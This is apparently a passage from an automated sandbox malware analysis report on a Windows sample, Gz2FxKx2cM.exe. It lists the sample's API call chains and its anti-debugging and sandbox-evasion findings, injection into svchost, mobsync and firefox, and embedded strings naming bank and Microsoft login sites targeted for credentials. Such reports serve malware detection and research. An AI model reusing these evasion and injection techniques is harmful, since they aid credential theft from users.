                Source: Binary string: wntdll.pdbUGP source: Gz2FxKx2cM.exe, 00000000.00000003.1459399779.0000000003850000.00000004.00001000.00020000.00000000.sdmp, Gz2FxKx2cM.exe, 00000000.00000003.1458037933.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1677898347.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582627864.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1580605438.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1677898347.0000000003700000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000007.00000003.1683183882.0000000004238000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000007.00000003.1681267661.000000000408F000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000007.00000002.1921600498.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000007.00000002.1921600498.000000000457E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Gz2FxKx2cM.exe, 00000000.00000003.1459399779.0000000003850000.00000004.00001000.00020000.00000000.sdmp, Gz2FxKx2cM.exe, 00000000.00000003.1458037933.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1677898347.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582627864.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1580605438.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1677898347.0000000003700000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000007.00000003.1683183882.0000000004238000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000007.00000003.1681267661.000000000408F000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000007.00000002.1921600498.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000007.00000002.1921600498.000000000457E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: mobsync.pdb source: svchost.exe, 00000002.00000003.1643779067.000000000301B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1643880204.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1643896188.0000000003031000.00000004.00000020.00020000.00000000.sdmp, HFOpYoEqWJkRNv.exe, 00000004.00000002.2675184319.0000000000FA8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: mobsync.exe, 00000007.00000002.1920673882.0000000002709000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000007.00000002.1921955822.0000000004A0C000.00000004.10000000.00040000.00000000.sdmp, HFOpYoEqWJkRNv.exe, 00000008.00000000.1749658940.000000000274C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2673702912.0000000014C3C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: mobsync.exe, 00000007.00000002.1920673882.0000000002709000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000007.00000002.1921955822.0000000004A0C000.00000004.10000000.00040000.00000000.sdmp, HFOpYoEqWJkRNv.exe, 00000008.00000000.1749658940.000000000274C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2673702912.0000000014C3C000.00000004.80000000.00040000.00000000.sdmp
                Source: Gz2FxKx2cM.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: Gz2FxKx2cM.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: Gz2FxKx2cM.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: Gz2FxKx2cM.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: Gz2FxKx2cM.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_00904B37 LoadLibraryA,GetProcAddress,0_2_00904B37
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_00928945 push ecx; ret 0_2_00928958
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004143C1 push cs; ret 2_2_004143C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00403070 push eax; ret 2_2_00403072
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004120AF push ebp; retf 2_2_004120B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418172 push esi; retf 2_2_0041817D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040AADE push ebp; iretd 2_2_0040AAE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00414344 push cs; ret 2_2_004143C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417C7C push esi; iretd 2_2_00417C7F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00413D3D push esp; ret 2_2_00413D3E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040CE68 push ecx; retf 2_2_0040CE6B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0370225F pushad ; ret 2_2_037027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037027FA pushad ; ret 2_2_037027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037309AD push ecx; mov dword ptr [esp], ecx2_2_037309B6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0370283D push eax; iretd 2_2_03702858
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_009048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_009048D7
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_00985376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00985376
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_00923187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00923187
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeAPI/Special instruction interceptor: Address: 1273484
                Source: C:\Windows\SysWOW64\mobsync.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD324
                Source: C:\Windows\SysWOW64\mobsync.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD944
                Source: C:\Windows\SysWOW64\mobsync.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD504
                Source: C:\Windows\SysWOW64\mobsync.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD544
                Source: C:\Windows\SysWOW64\mobsync.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD1E4
                Source: C:\Windows\SysWOW64\mobsync.exeAPI/Special instruction interceptor: Address: 7FFBCB7B0154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377096E rdtsc 2_2_0377096E
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-105451
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeAPI coverage: 4.5 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.6 %
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exe TID: 8144Thread sleep time: -80000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_0096445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0096445A
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_0096C6D1 FindFirstFileW,FindClose,0_2_0096C6D1
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_0096C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0096C75C
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_0096EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0096EF95
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_0096F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0096F0F2
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_0096F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0096F3F3
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_009637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_009637EF
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_00963B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00963B12
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_0096BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0096BCBC
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_009049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_009049A0
                Source: 10O4645j.7.drBinary or memory string: ms.portal.azure.comVMware20,11696494690
                Source: 10O4645j.7.drBinary or memory string: discord.comVMware20,11696494690f
                Source: 10O4645j.7.drBinary or memory string: AMC password management pageVMware20,11696494690
                Source: 10O4645j.7.drBinary or memory string: outlook.office.comVMware20,11696494690s
                Source: 10O4645j.7.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                Source: 10O4645j.7.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                Source: 10O4645j.7.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                Source: 10O4645j.7.drBinary or memory string: interactivebrokers.comVMware20,11696494690
                Source: 10O4645j.7.drBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                Source: 10O4645j.7.drBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                Source: 10O4645j.7.drBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                Source: 10O4645j.7.drBinary or memory string: outlook.office365.comVMware20,11696494690t
                Source: 10O4645j.7.drBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                Source: HFOpYoEqWJkRNv.exe, 00000008.00000002.2675352108.000000000095F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll+
                Source: 10O4645j.7.drBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                Source: 10O4645j.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                Source: 10O4645j.7.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                Source: mobsync.exe, 00000007.00000002.1920673882.0000000002709000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 10O4645j.7.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                Source: 10O4645j.7.drBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                Source: 10O4645j.7.drBinary or memory string: tasks.office.comVMware20,11696494690o
                Source: 10O4645j.7.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                Source: 10O4645j.7.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                Source: 10O4645j.7.drBinary or memory string: dev.azure.comVMware20,11696494690j
                Source: 10O4645j.7.drBinary or memory string: global block list test formVMware20,11696494690
                Source: 10O4645j.7.drBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                Source: 10O4645j.7.drBinary or memory string: bankofamerica.comVMware20,11696494690x
                Source: 10O4645j.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                Source: 10O4645j.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                Source: 10O4645j.7.drBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                Source: 10O4645j.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                Source: 10O4645j.7.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                Source: Gz2FxKx2cM.exe, 00000000.00000002.1460162657.000000000118B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareworkstation.exe
                Source: 10O4645j.7.drBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeAPI call chain: ExitProcess graph end nodegraph_0-104641
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377096E rdtsc 2_2_0377096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417543 LdrLoadDll,2_2_00417543
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_00973F09 BlockInput,0_2_00973F09
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_00903B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00903B3A
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_00935A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00935A7C
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_00904B37 LoadLibraryA,GetProcAddress,0_2_00904B37
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_012720A0 mov eax, dword ptr fs:[00000030h]0_2_012720A0
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_01273750 mov eax, dword ptr fs:[00000030h]0_2_01273750
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_012736F0 mov eax, dword ptr fs:[00000030h]0_2_012736F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D437C mov eax, dword ptr fs:[00000030h]2_2_037D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov ecx, dword ptr fs:[00000030h]2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FA352 mov eax, dword ptr fs:[00000030h]2_2_037FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D8350 mov ecx, dword ptr fs:[00000030h]2_2_037D8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C310 mov ecx, dword ptr fs:[00000030h]2_2_0372C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03750310 mov ecx, dword ptr fs:[00000030h]2_2_03750310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A30B mov eax, dword ptr fs:[00000030h]2_2_0376A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A30B mov eax, dword ptr fs:[00000030h]2_2_0376A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A30B mov eax, dword ptr fs:[00000030h]2_2_0376A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E3F0 mov eax, dword ptr fs:[00000030h]2_2_0374E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E3F0 mov eax, dword ptr fs:[00000030h]2_2_0374E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E3F0 mov eax, dword ptr fs:[00000030h]2_2_0374E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037663FF mov eax, dword ptr fs:[00000030h]2_2_037663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03808324 mov eax, dword ptr fs:[00000030h]2_2_03808324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03808324 mov ecx, dword ptr fs:[00000030h]2_2_03808324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03808324 mov eax, dword ptr fs:[00000030h]2_2_03808324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03808324 mov eax, dword ptr fs:[00000030h]2_2_03808324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE3DB mov eax, dword ptr fs:[00000030h]2_2_037DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE3DB mov eax, dword ptr fs:[00000030h]2_2_037DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE3DB mov ecx, dword ptr fs:[00000030h]2_2_037DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE3DB mov eax, dword ptr fs:[00000030h]2_2_037DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D43D4 mov eax, dword ptr fs:[00000030h]2_2_037D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D43D4 mov eax, dword ptr fs:[00000030h]2_2_037D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EC3CD mov eax, dword ptr fs:[00000030h]2_2_037EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]2_2_037383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]2_2_037383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]2_2_037383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]2_2_037383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B63C0 mov eax, dword ptr fs:[00000030h]2_2_037B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0380634F mov eax, dword ptr fs:[00000030h]2_2_0380634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728397 mov eax, dword ptr fs:[00000030h]2_2_03728397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728397 mov eax, dword ptr fs:[00000030h]2_2_03728397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728397 mov eax, dword ptr fs:[00000030h]2_2_03728397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E388 mov eax, dword ptr fs:[00000030h]2_2_0372E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E388 mov eax, dword ptr fs:[00000030h]2_2_0372E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E388 mov eax, dword ptr fs:[00000030h]2_2_0372E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375438F mov eax, dword ptr fs:[00000030h]2_2_0375438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375438F mov eax, dword ptr fs:[00000030h]2_2_0375438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734260 mov eax, dword ptr fs:[00000030h]2_2_03734260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734260 mov eax, dword ptr fs:[00000030h]2_2_03734260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734260 mov eax, dword ptr fs:[00000030h]2_2_03734260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372826B mov eax, dword ptr fs:[00000030h]2_2_0372826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A250 mov eax, dword ptr fs:[00000030h]2_2_0372A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736259 mov eax, dword ptr fs:[00000030h]2_2_03736259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EA250 mov eax, dword ptr fs:[00000030h]2_2_037EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EA250 mov eax, dword ptr fs:[00000030h]2_2_037EA250
